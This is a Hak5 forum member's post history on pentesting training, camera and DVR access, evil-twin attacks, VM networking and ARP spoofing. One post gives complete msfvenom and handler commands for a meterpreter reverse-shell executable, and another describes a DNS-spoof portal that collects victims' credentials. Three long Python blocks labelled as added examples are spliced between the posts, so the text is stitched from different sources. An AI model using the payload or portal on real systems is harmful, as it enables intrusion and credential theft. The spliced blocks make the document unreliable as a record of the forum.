
digip (Dedicated Members) - Posts: 8,919 - Days Won: 144

Everything posted by digip

  1. I had recently seen something for Powershell, that allows any code to run, but required a registry tweak to accept the applied manifests or signatures for the scripts. Not exactly what you were looking for, but something might spark an idea on how to work around a whitelist for apps.
  2. I take it you are in India? Might want to edit your post, remove your public IP address.
  3. I think it depends on the camera and DVR, and if they are only wifi based. If they are wired to the network, then you'd have to be on the same network to connect with them, or if mis-configured, connect to them over the internet, which sadly, a lot of cameras are open directly from the web, not just for viewing, but also to login to the admin panel of the cameras. A lot of the cameras have built in web servers, but are still attached to the local network as clients, and you'd still have to be on the same LAN to connect with the camera in most cases. You can login to view remotely what is on the camera over wifi on many of them if they are configured this way, and some are configured for two different types of users: normal viewing only mode, and admin panel privs for setting up email alerts, motion activated capture, night vision settings, and offloading to storage for images or video. That is how one of mine is anyway. Evil Twin, in this instance, might not work the way you're thinking though, as the DVRs are usually plugged in over the wired network side, not on wifi (just what I've seen, but doesn't mean they all work this way). While you could make the camera connect back to you with the evil twin if it were an open network, more than likely the DVR is somewhere attached over ethernet, and not wifi based alone, but I don't own a DVR, so can't say for sure that all of them work this way. I know at my wife's old work, the camera system was wireless, but the DVR for the security system was wired to the network (was actually VHS, not digital), and the cameras were just clients of the same network over wifi, and it was easy to prevent the system from working by deauthing the cameras; the DVR would record nothing. Poor implementation in this case.
My camera is connected to the network over wifi, but can also be done over ethernet with wifi disabled, but for putting it outside or on the edge of the house, I had to use wifi, and it's a client of my network when I had it up. So while it has its own web server built in, it's still a client of my network, and in order for me to reach it directly to record and save images, you need to set up a local server, which in the case of DVRs, they more or less are the storage server, and often the creds are for FTP to save out from the camera to the storage server (this is just how mine worked, not sure if DVRs are any more secure than this). Mine, I just set up FileZilla at the time and saved off over FTP, which is plain text with passwords in the clear, and I don't recommend this if you can avoid it. So if you can make yourself the same SSID as the home network router, you may be able to see the cameras directly, but unless the DVR is wireless as well, you'd need to be on the same network to get access to the DVR itself.
  4. If you don't have a background in Information Technology, ie: no formal training, at a minimum, get some basic classes in. If you truly know your networking and sysadmin stuff, then sure, take a gander at SANS and Offsec, but don't just jump in if you don't have some sort of foundational grasp of things. CompTIA Network+, Linux+ (even an A+ class, but not required) and a basic Windows MCP class should be enough to grasp most things needed for the security side, but most people in penetration testing started on the LAN side or as System Administrators with networking backgrounds before going to the other side. Not a requirement, but it will make your life much easier before trying a pentesting course. Knowing TCP/IP basics, the OSI model, and some form of file sharing and network administration, ie: Active Directory, SMB/Samba, and Windows and Linux OS command line use, will greatly help you in the long run. Offsec's PWK is more or less entry level pentesting, but I wouldn't consider it an easy course by any means. It's very foundational and very instructional, but it's 100% hands-on; you need to physically do the task to pass. Part video, part text instructional, you'll spend most of your time in a VPN'ed virtual lab, performing real attacks against actual installed machines set up with real world vulnerabilities or mis-configurations, all networked like a real corporate network, allowing you to attack one machine and pivot through the network to others. SANS is also a really good class, but I wouldn't consider either theirs or Offsec's to be "hey, took the class, now I'm a pro". It will definitely build the mindset needed to be a pentester, and both will allow you to physically do the things you would in a pentest. SANS is a number of courses, some of which may only be instructional with multiple choice questions; OSCP and other Offsec courses are all hands-on, you have to perform actual hacking tasks to pass, and there are no multiple choice questions.
You also have to write an actual pentest report, which is a part of your passing grade as well, so don't just pass that part up, because it's what you would need to know and do well in the real world if doing the same thing for your job. If you have no background in any of the above I mentioned, start out gradually and build on the basics. Cybrary, YouTube, Google and SecurityTube can help. Look into the following materials; you don't have to take the certifications, but can still read the books on the topics to get more well rounded:
CompTIA Network+
CompTIA Linux+
CompTIA Security+
Microsoft MCP books for MCSA/MCSE
Set up a home lab with some virtual machines: set up a domain controller with Windows Server, an Active Directory domain, network some client computers to it, and try out some CTFs from places like Vulnhub or Hack The Box, as well as Pentester Academy. Then I'd work on PWK/OSCP and then maybe SANS.
  5. Basically, know how to be a sysadmin, OS guru and network monkey before jumping into the deep end of the pool. Pentesters know this stuff because most of them come from that background first, and generally do because they know where the weaknesses are in the setup and misconfiguration of most systems and networks, having spent time setting them up previously in their career. Maybe not all of them, but a lot of them start on that side of the fence. A lot of those guys started out as general Windows and Linux admins, with certs for things like MCSA, CCNA, etc, and have a well rounded understanding of networking, protocols and services and how all of that connects to one another. This is only a small part of the puzzle though. Writing shellcode and lower level things will require more than just throwing a hail mary from metasploit at a system; they require time and dedication. Understanding what is happening, and why, is more important than how many shells you can pop, and popped shells != pentesting. There are a lot of things to take into consideration, from scope, impact to business and finances, etc. People who think they know more tend to know the least. Just in my experience. I know enough to know I don't know enough. You can't learn anything if you think you know everything already. Be humble and curious would be my suggestion. Those people you think you know more than could probably teach you many things more than you know already, all of which would help you in the long run.
  6. You can set netcat to listen, and when it connects back, you will see the connection, but not be able to interact with it. Sometimes funky characters come back in the console (from what I recall) but not always. If it's not metasploit communicating with it, it won't set up the session properly when meterpreter based payloads are used. If using meterpreter based payloads, as far as I know, you need to be listening in metasploit to handle the session (or armitage, which is just a GUI based on metasploit, just an example), but maybe there are options to change that in msfvenom when creating the payload, or just use a generic one that's not meterpreter based instead. When you use a meterpreter based shell, metasploit looks for specific hooks to send a stager back over, which are also architecture based, ie: x86 meterpreter shell vs x64 based, and handles the connection differently in how it gets executed on the victim machine and to the attacker.
  7. If the box is 64bit (which more than likely it is for Windows 8) then use what I put above, and not the x86 you tried before. Just need to rule that out, and also try adding the tag for no bad characters, ie: \x00, etc.
  8. I don't think that is the case, but I'd retrace the setup process for the executable run on the victim machine. Make sure you encode the executable with no bad characters to ignore like 0D, 0A, and 00, etc, and pick the right architecture (32 vs 64bit). Make sure you're listening on the correct port or try a different port range. If the victim is in a VM connected to the host or such, make sure bridged networking isn't sharing the same MAC address and they are properly networked. If behind NAT, be sure to port forward properly to the listening machine and so on. Just throwing out things to check and make sure are set up properly. Post the whole string you used to create the binary file.
edit: Just to show a working example, here is what I did on my own system against a Windows 7 x64 box.

# build the x64 staged meterpreter payload, excluding the bad characters, as an exe
msfvenom --platform Windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.66 lport=4444 -b '\x0A\x0D\x00' -f exe -o poop.exe

# in msfconsole, start a handler with the same payload, LHOST and LPORT
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.66
set lport 4444
exploit

# once poop.exe runs on the victim: list sessions, interact with session 1, and test with dir
sessions
sessions 1
dir
  9. What are the commands you type after interacting with the session? Do a basic ls, or dir for Windows. Do you get a file listing from the Windows machine? If not, something isn't set up 100%. Even if cmd was disabled on the Windows 8 machine, you should get some kind of return like "command prompt has been disabled by your administrator" or such.
  10. Type "sessions", what is listed?
  11. Should probably link to the parent wikis for each device on the official Hak5 git repo too, for the general documentation and things not covered by yours. https://github.com/hak5 and https://github.com/hak5darren/wifipineapple-wiki as well as https://ducktoolkit.com/ which I believe is just the website render from the Git files.
  12. I used FruityWifi to redirect my visitors, and can't remember, but I think it's dnsspoof that it uses along with Responder to catch and redirect them. When you log on and open a browser on any device, it redirects to my portal page, which is just a bit of PHP and HTML that saves anything they type and enter on the form to a CSV file. It is most definitely a DNS spoof attack. However, it will not work on anything that has HSTS; although I do have SSL enabled on my attacking machine, if the site uses HSTS, it won't work to send them the portal. It will capture the creds over https though, so long as they don't have HSTS or hard coded sites in the browser (many browsers do this now for top sites like Google and Facebook), since the page runs locally on the server and is where I redirect them to, but HSTS will prevent loading if they try to go to, say, google.com or facebook.com. For that, you apparently need SSLstrip for V1 and V2, and I couldn't seem to get it working on my test machine, but that doesn't mean it can't be done. SSLstrip v2 or SSLstrip+ claims to be able to bypass HSTS though. See here: https://github.com/LeonardoNve/sslstrip2
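The HSTS behaviour described in the post above, modelled as an added example (this is not code from the post, from FruityWifi or from sslstrip2): a spoofed-DNS portal served over plain HTTP loads for hosts the browser has no HSTS policy for, is refused for preloaded hosts or hosts whose policy it has already seen, and the hostname-rewriting trick sslstrip2 relies on (sending the victim to a made-up subdomain) only gets past a stored policy when that policy lacks includeSubDomains. The preload entries, the bank.test / shop.test headers and the fixed clock are constructed; the class is a simplified model of what a browser stores, not a real browser.

```python
import time

# Constructed stand-in for the browser's built-in HSTS preload list
# (host -> includeSubDomains). The real list is far larger; these are examples only.
PRELOADED = {"google.com": True, "facebook.com": True}


class HstsCache:
    """Minimal model of a browser's dynamic HSTS store (RFC 6797 semantics, simplified)."""

    def __init__(self, clock=time.time):
        self.entries = {}  # host -> (expiry_epoch, include_subdomains)
        self.clock = clock

    def observe(self, host, headers, now=None):
        """Learn a policy from the headers of an HTTPS response for `host`."""
        value = headers.get("Strict-Transport-Security")
        if value is None:
            return
        max_age, include_sub = None, False
        for directive in value.split(";"):
            name, _, arg = directive.strip().partition("=")
            name = name.strip().lower()
            if name == "max-age":
                try:
                    max_age = int(arg.strip().strip('"'))
                except ValueError:
                    return  # malformed header: browsers ignore it entirely
            elif name == "includesubdomains":
                include_sub = True
        if max_age is None:
            return  # max-age is mandatory; without it the header is ignored
        t = self.clock() if now is None else now
        host = host.lower()
        if max_age == 0:
            self.entries.pop(host, None)  # max-age=0 deletes a stored policy
        else:
            self.entries[host] = (t + max_age, include_sub)

    def is_known_https(self, host, now=None):
        """True if the browser would refuse plain HTTP (and so the spoofed portal) for `host`."""
        t = self.clock() if now is None else now
        labels = host.lower().split(".")
        for i in range(len(labels)):
            candidate = ".".join(labels[i:])
            exact = i == 0  # a parent domain's policy applies only with includeSubDomains
            if candidate in PRELOADED and (exact or PRELOADED[candidate]):
                return True
            entry = self.entries.get(candidate)
            if entry is not None:
                expiry, include_sub = entry
                if expiry > t and (exact or include_sub):  # expired policies count as absent
                    return True
        return False


def portal_redirect_works(cache, host, now=None):
    """Would a DNS-spoofed, plain-HTTP captive portal load when the victim types `host`?"""
    return not cache.is_known_https(host, now)


if __name__ == "__main__":
    cache = HstsCache(clock=lambda: 1000.0)  # fixed clock so the example is repeatable
    cache.observe("bank.test", {"Strict-Transport-Security": "max-age=31536000; includeSubDomains"})
    cache.observe("shop.test", {"Strict-Transport-Security": "max-age=60"})
    for h in ("google.com", "bank.test", "wwww.bank.test", "shop.test", "wwww.shop.test", "random.test"):
        print(h, "portal loads" if portal_redirect_works(cache, h) else "blocked by HSTS")
```

The wwww.shop.test case is the one sslstrip2 exploits: shop.test set a policy without includeSubDomains, so a rewritten hostname under it is not covered. Against bank.test (includeSubDomains) or a preloaded domain the same trick does nothing, which matches the post's observation that the portal never loads for google.com or facebook.com.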
  13. You can use the @ symbol in front of a name; it will ping people for replies on a post. As for spanning a port, he's talking about port mirroring (I assume), which is a feature of certain equipment, built into certain routers and switches such as higher end Cisco switches. It allows you to patch and copy a specific port out to a listening node, which lets you go down the line one by one to listen in on each connected device. On wifi, the only thing I can say is MITM, or sniff from the router directly, which in your case is probably not possible with the all-in-one devices provided by the ISP. It could be that the firewall blocked the local network from the ISP side, and it may be a subnet local to the other side of the modem on the ISP side, but even then, NAT should be in play. I know when I first got Comcast, if I set my IP range up differently than the default 192.168.1.x subnet and was on the 10.x.x.x network, I was able to see their internal network. This was something misconfigured on their end, and shouldn't have allowed me to see their network. I was, at the time, not behind NAT though, and directly connected to the modem from my workstation. This is when I first went and bought a 4 port switch with NAT to put up a firewall at the edge of my network. We're talking 1990s here, but I suspect the same could be done today: if you manage to figure out an IP range on the ISP side and connect without NAT over a cable modem, you might be able to scan the internals of the ISP if on the same subnet settings. They can surely do the same and see into your network when you connect directly to them, which is why you should always have a NAT'd firewall at the edge of your home network. You can set your NIC to anything. Unless something else is on the same set subnet, you can't see each other without being bridged between the two networks.
However, plugging directly into your network, or even a PC like the Bash Bunny, I imagine it would show up as a new network to the internal LAN if scanned for, which is why I was asking if anyone was playing with these kinds of tools, since they can have their own set network/subnet.
  14. Feeding paranoia solves nothing. Find evidence and work out the issues, if there really is one. Unless your network or device has been compromised, and you know this somehow, more than likely you're over thinking things. Is it possible for someone to remote-view or even remotely login to the machine? Sure. Can they take screenshots? Sure. But they'd have to compromise the machine in some manner to do so, either by being on the same network, or you running a program that allows them access to the machine, or clicking and executing some sort of exploit code that gives them full control of the machine. Living near you isn't a requirement, and the location could be anywhere from in the same house to half way around the world. If you really think the machine is compromised, investigate, or if more paranoid, just nuke the box and reinstall. If you think it's your network that they could have gotten into, then assess your setup and fix as needed. First thing, check for loose cables, a loose video card, and update drivers for the graphics card. Could even be a faulty monitor, monitor settings or refresh rate. Rule out the obvious things first and then work out the rest.
  15. Think of this logically. Your VM is inside the HOST. The host connects to the AP using its wireless card. Then the VM connects to the rest of the network through the host's adapter. The rest of the network, if they need to reach the VM, they need to know where it is. It's "inside" the HOST. The HOST machine is your VM's border to machines "outside" the host. This would be the same as if you bridged two wifi routers together. Everything connected to router A would have router A's MAC address when people on router B tried to ping any of the other machines on router A. People on router A pinging each other will see all the correct MAC addresses, whereas people on router B will see the same MAC for all of the devices connected behind router A. To work around this, and if you need to use the wireless network for more than just connectivity, you would use a USB wifi adapter so everyone can see it as a physical machine on the same segment, instead of something behind a bridge (which is why other machines outside the host see the MAC as the same as the HOST). It will still work for just normal connection to the internet and such the way you have it now, which is doing a forward of the VM to the main network segment. Below you can see the same thing, on my own network.
  16. I don't have anything really wired other than from my desktop to the router, which has been on Cat6a for years now, while the router is bridged wirelessly to my main router which then goes to the modem. I'd like to run directly from room to room with wired, but I just haven't bought the cable to make use of it for the new house. When/if I do, I will probably go with the Cat7a, but ideally, I need to get rid of the third router, which is an older Cisco and can't do the 802.11ac that my other two are using now. I don't even know if my other two have 10-Gigabit physical ports. I think they are only Gigabit, but better to have the 7a cable even if you don't have 10-GBit network equipment, because when you do upgrade, you'll then have that cable, vs having to upgrade both later on. It will work fine and is backwards compatible; if anything it should reduce network noise even more and maximize the hardware and adapter speeds you already have, even if they are only 10/100/1000 devices. I don't see any reason to buy older standards other than maybe for a small patch cable to carry in a laptop case for when on the road. What is Cat-7e? Cat-7 and Cat-7a. I know we're trolling you a bit, but I think maybe you think this is some simple task, which also would be breaking the law if you get caught tapping into a physical connection other than your own. How do you plan to "siphon" data in order to make an internet connection, and from where? How are you connecting to this other said network backbone to the internet, where are these physical wires you plan to jack into? I think there is some fundamental stuff missing here on your part and the scenario. Mostly networking 101 in general seems to have just gone out the window here; not sure I understand how you managed to get free internet with a "private" network, shared with the pineapple, and then to whom? Fake AP, that hosts a private network connected to itself?
  17. And something in the VM is not right, so reset the adapter's MAC manually on the VM when not booted, then try again, or change it in the VM, and then bring the adapter down and back up to renew your lease and try again. I'm assuming the HOST's wifi is connected to an AP before the VM is even in the loop, and on the VM, the NIC is set to bridged, which is using the HOST's already connected wifi connection? Because this is how I have to use my own internal WiFi card just to use it in the VM, which again, only works for connectivity and is shared by the host. If so, your VM is not using wifi directly nor independently, has no real control over the network card, and can't properly even do DHCP. It's only sharing the host's connection, and when it sees it, it's passed back and forth to the host as a bridged adapter. It should still have its own MAC address though, and an IP independent of the HOST machine. I have mine up now to test, using my internal Intel card to connect to the network over wifi and passing it to the VM as a bridged adapter; it can't physically get onto the network unless I have the connection from the host started first. My wired NIC however can, and the VM creates an additional "virtual" adapter in my HOST machine's network manager and shows an extra adapter for the virtual NIC. It doesn't however do this for the wifi with the same kind of control to use it independently, which is a limitation of virtual machines and internal wireless cards to begin with. In any case, using a USB wifi adapter should resolve this issue and allow the VM to have its own physical network card to connect to the home AP and subnet, and from there, you can do whatever you need, whether it be surfing the web or trying arp spoofing attacks. The only other thing I would say to try is run arp -d on the other machines against the IP of the VM, ie: "arp -d x.x.x.x" where x.x.x.x is the IP address of the VM.
Then ping the VM's IP and check the arp table again, which should show whatever it believes this device's MAC to be. If it still shows the same as the HOST machine, then get a USB wifi card, and you should have no issues.
  18. Uh.. ok, I want free interwebs.. sign me up! 'Splain me how this works?? Where do I plug in my stuff?
  19. Sounds like the router's firewall did its job. Arbitrary internal LAN IP ranges not configured for your subnet would be a quick red flag, but could be something as simple as someone plugged in a device like one of the Hak5 USB tools, or a pineapple is bridged to your network? Are you testing anything like that on the network? Playing with any other tools like that or devices on the network? If not, time to inspect everything. If this is a home network, power all your devices down and disconnect them from the wifi and wired side, then clear the firewall log. Then from your machine, run an nmap scan:
nmap -n -sn 172.0.0.0/8
This will do an arp discovery of all devices on the network, their IP and MAC address. However, this should fail for all IP ranges other than what is on your subnet, ie: 172.27.x.x
edit: digininja has a good point on possibly being a mis-configured device, with someone trying to manually set an IP for a machine, but if it's a home network and not an office network, you should know who has what on the network. Also, I had thought about my original assessment to scan the 172.0.0.0/8 subnet; this should actually not work at all since you aren't on the same subnet, and you'd also end up hitting the internet, which would also fail for the arp and never get past NAT. If you configure your NIC to be on the 172.16.0.0/16 subnet and then try a scan, you should also be blocked by your router's firewall and trigger the same kind of messages, so even if a device on the network tried to get on from a non-routable subnet, it would more than likely fail unless they physically bridged the two networks/dual-homed it or plugged directly into the main router/switch to share their other side of the network.
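As an added example (not code from the post or from any Hak5 tool), a small triage of router firewall log lines against the configured LAN subnet, which is the check the post above walks through by hand: an RFC 1918 source on the LAN side that is outside your own subnet points at a mis-set static IP or a bridged/dual-homed device, while a private source arriving on the WAN side should never happen at all. It also includes the ARP-reachability rule behind the post's correction about the 172.0.0.0/8 sweep. The log format, the interface names (br0 assumed to be the LAN bridge, eth0 the ISP-facing side) and every address are constructed for the example.

```python
import ipaddress
import re

# Constructed router log lines in a netfilter/iptables LOG style; not real logs.
# Assumption for the example: br0 is the LAN bridge, eth0 is the WAN/ISP-facing interface.
SAMPLE_LOG = """\
Oct 10 08:01:11 router kernel: DROP IN=br0 OUT= SRC=172.16.4.20 DST=172.27.0.1 PROTO=TCP SPT=50112 DPT=80
Oct 10 08:01:12 router kernel: ACCEPT IN=br0 OUT= SRC=172.27.1.15 DST=172.27.0.1 PROTO=UDP SPT=5353 DPT=5353
Oct 10 08:01:13 router kernel: DROP IN=eth0 OUT= SRC=10.0.0.7 DST=172.27.0.1 PROTO=TCP SPT=44321 DPT=23
Oct 10 08:01:14 router kernel: DROP IN=eth0 OUT= SRC=203.0.113.9 DST=172.27.0.1 PROTO=TCP SPT=41000 DPT=22
Oct 10 08:01:15 router kernel: DROP IN=br0 OUT= SRC=192.168.1.50 DST=172.27.0.1 PROTO=ICMP
"""

# RFC 1918 checked explicitly: ipaddress.is_private also counts documentation ranges like 203.0.113.0/24.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
FIELDS_RE = re.compile(r"IN=(?P<iface>\S*)\s.*?SRC=(?P<src>[\d.]+)\s+DST=(?P<dst>[\d.]+)")


def is_rfc1918(addr):
    return any(addr in net for net in RFC1918)


def parse_log(text):
    """Yield (iface, src, dst) for every line carrying IN=/SRC=/DST= fields."""
    for line in text.splitlines():
        m = FIELDS_RE.search(line)
        if m:
            yield (m["iface"], ipaddress.ip_address(m["src"]), ipaddress.ip_address(m["dst"]))


def classify(iface, src, lan_subnet, lan_iface):
    """Explain why a packet with this source, seen on this interface, is (or is not) suspicious."""
    if iface == lan_iface:
        if src in lan_subnet:
            return "expected"                     # ordinary LAN client
        if is_rfc1918(src):
            return "off-subnet private on LAN"    # static IP typo, or a bridged / dual-homed device
        return "public source on LAN"             # nothing on the LAN side should use a public address
    if is_rfc1918(src):
        return "private source on WAN"            # bogon from the ISP side; should never reach you
    return "public source on WAN"                 # routine internet noise


def triage(text, lan_cidr, lan_iface):
    """Return [(src, verdict), ...] in log order for the given LAN subnet and LAN interface."""
    lan = ipaddress.ip_network(lan_cidr)
    return [(str(src), classify(iface, src, lan, lan_iface)) for iface, src, _ in parse_log(text)]


def reaches_via_arp(target, local_iface):
    """ARP (what nmap -sn uses on a local segment) only resolves hosts inside the interface's own
    subnet; anything else is handed to the default gateway, so a /8 sweep from a /16 mostly routes."""
    return ipaddress.ip_address(target) in ipaddress.ip_interface(local_iface).network


if __name__ == "__main__":
    for src, verdict in triage(SAMPLE_LOG, "172.27.0.0/16", "br0"):
        print(f"{src:15} {verdict}")
    print("172.27.9.9 on-link:", reaches_via_arp("172.27.9.9", "172.27.5.10/16"))
    print("172.16.0.1 on-link:", reaches_via_arp("172.16.0.1", "172.27.5.10/16"))
```

Run it against your own log export with the real LAN CIDR and interface name; the two "off-subnet private on LAN" lines are the ones worth chasing down device by device, as the post suggests.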
  20. I think maybe something is out of whack from when you were playing with arpspoof; you should probably reset the MAC on the VM's adapters. If doing no attacks at all before even doing arpspoof, and just checking arp -a, and they look to be wrong, I'd say reboot your VM and make sure all network settings are back to normal, no ip_forward set in the VM too. Then ping each machine and check the arp tables again. They should reset to what they are expected. You can also check the adapter settings on the VM to see what the MAC address is set to for eth0 and wlan0, and you can change this for all VMs manually or set to a random new MAC before starting the VM. If eth0 still shows the same as the host, then it's probably where things are causing issues with the arpspoof stuff, and I'm going to say try changing the NIC's MAC manually once booted and then check arp -a again (do a ping to other machines to tell them your new MAC address); make sure it's bridged to the physical network, and not to the host only/shared by the host. Once you get your MAC addresses sorted out, and when trying the attack again with arpspoof, see what happens. Might help to post a diagram of the machines and how they are connected. Can show the IP addresses as well and your commands, along with what is physically connected to the network. We don't really need to know the MAC addresses, but just understand that ARP attacks happen at layer two by poisoning the ARP table contents with the IP and MAC impersonating the gateway and victims, and the attacker will appear as both the gateway and victim. If these didn't clear from when you reverted the machine in testing previously, your VM might have a host MAC address and just need to be reset/rebooted. You can open wireshark before doing the attack, and then see how it happens to get a better understanding of what is going on though.
I don't know the topology of the network and what is what, so it helps when you can see what goes where with what settings and connectivity. Might figure it out on your own just in drawing it out so you can see what you expect, and know what to fix.
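An added example, not from any of the posts, covering the MAC symptoms discussed in posts 15, 17 and 20: parse arp -a output (Linux and Windows layouts), list IPs that resolve to one MAC, and compare a table against a known-good baseline to spot the gateway's MAC moving onto another host, which is exactly what an arpspoof run looks like from a third machine. All tables and addresses are constructed; 192.168.1.66 is assumed to be the attacking VM in the made-up "during" table.

```python
import re
from collections import defaultdict

# Constructed `arp -a` output (Linux layout) as seen from a third machine on the segment:
# once before any attack, once while arpspoof is impersonating the gateway. Not real captures.
ARP_BEFORE = """\
_gateway (192.168.1.1) at aa:aa:aa:aa:aa:01 [ether] on eth0
? (192.168.1.50) at bb:bb:bb:bb:bb:50 [ether] on eth0
? (192.168.1.66) at cc:cc:cc:cc:cc:66 [ether] on eth0
"""
ARP_DURING = """\
_gateway (192.168.1.1) at cc:cc:cc:cc:cc:66 [ether] on eth0
? (192.168.1.50) at bb:bb:bb:bb:bb:50 [ether] on eth0
? (192.168.1.66) at cc:cc:cc:cc:cc:66 [ether] on eth0
"""
# Constructed Windows `arp -a` fragment, to show the parser handles that layout too.
ARP_WINDOWS = """\
Interface: 192.168.1.20 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           aa-aa-aa-aa-aa-01     dynamic
  192.168.1.66          cc-cc-cc-cc-cc-66     dynamic
"""

LINUX_RE = re.compile(r"\((?P<ip>\d+\.\d+\.\d+\.\d+)\) at (?P<mac>[0-9a-f:]{17}) .* on (?P<iface>\S+)", re.I)
WINDOWS_RE = re.compile(r"^\s*(?P<ip>\d+\.\d+\.\d+\.\d+)\s+(?P<mac>[0-9a-f-]{17})\s+(?:dynamic|static)", re.I)


def parse_arp(text):
    """Map IP -> MAC (lower-case, colon separated) from Linux or Windows `arp -a` output."""
    table = {}
    for line in text.splitlines():
        m = LINUX_RE.search(line) or WINDOWS_RE.match(line)
        if m:
            table[m["ip"]] = m["mac"].lower().replace("-", ":")
    return table


def shared_macs(table):
    """IPs that resolve to the same MAC. Expected for a VM bridged behind its host's wifi (others
    see the host's MAC for both); during ARP poisoning the attacker's MAC shows for gateway and victim."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def changed_macs(baseline, current):
    """IP -> (old_mac, new_mac) for every entry whose MAC differs from the baseline table."""
    return {ip: (baseline[ip], mac) for ip, mac in current.items()
            if ip in baseline and baseline[ip] != mac}


def gateway_spoofed(baseline, current, gateway_ip):
    """True when the gateway's MAC changed AND now matches a MAC some other host already uses."""
    new_mac = current.get(gateway_ip)
    if new_mac is None or baseline.get(gateway_ip) == new_mac:
        return False
    return any(ip != gateway_ip and mac == new_mac for ip, mac in current.items())


if __name__ == "__main__":
    before, during = parse_arp(ARP_BEFORE), parse_arp(ARP_DURING)
    print("shared before:", shared_macs(before))
    print("shared during:", shared_macs(during))
    print("changed:", changed_macs(before, during))
    print("gateway spoofed:", gateway_spoofed(before, during, "192.168.1.1"))
    print("windows table:", parse_arp(ARP_WINDOWS))
```

Take the baseline with the VM powered off, as the post recommends, then diff after each change: a shared MAC that persists with no attack running is the bridged-host symptom from post 15, while a gateway entry that jumps to another host's MAC only while arpspoof runs is the attack working as intended.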
  21. I think they've done this where they shut down a second drone's wifi before. Shannon and Darren were each flying one and Darren would shut Shannon's drone down. If you want to see something like this with a full Kali install over wifi on a drone, check out Re4son's Pi. Can do more than just wardriving - https://whitedome.com.au/re4son/sticky-fingers-kali-pi/
  22. Self hosting is an option, but in this instance, I'd avoid it. Why expose your internal org when you don't need to? Plenty of hosting and storage options, some cheap, some expensive. Depends on your needs. I just don't think self hosting and sharing your company network with the outside world is a best practice, unless you want to get popped and then pivoted to the rest of your internal devices (especially if you're a freelancer who works from home and has personal machines on the same network - I work from home so just speaking from experience). This is the reason things like cloud storage exist; in the event files get whacked online, you should have in house backup copies and off site recovery solutions/backups in place in addition, but that is just how I would go if I had the money. An AWS bucket or Azure server might be cheap enough, or again, talk to your hosting provider, see if they are worth staying with or find a better all-in-one hosted solution, vs paying for extra storage another host might include in the yearly plan.
  23. If you're on mobile, might not show, but on desktop if you look at the top right of a post, you see a "follow" button. Click it. Then go to https://forums.hak5.org/discover/followed-content/ to see your followed content.
  24. Re: order status
    Store contact - https://hakshop.zendesk.com/hc/en-us/requests/new and generally, weekdays for responses (per their page). Shop crew is just a few people who do everything themselves, in house. They also might be at Derbycon, but I am not a member of the Hak5 crew, so I can't speak for them, just my observations. They tend to be a skeleton crew around conference time though, with many of them working at the con booth, but again, I can't speak for them. Just have to wait till you hear back from them. You should get a ticket # and an email (hopefully) after your info is sent, so if you don't see anything, check your spam settings.
  25. Re: order status
    #1 - Forums are not customer service. Shop isn't going to see this, generally. #2 - Patience. #3 - Contact through the store if after a week or so nothing comes to you. Wait for a response. They do respond and reply on a first come first serve basis, but don't jump the gun. Give it time.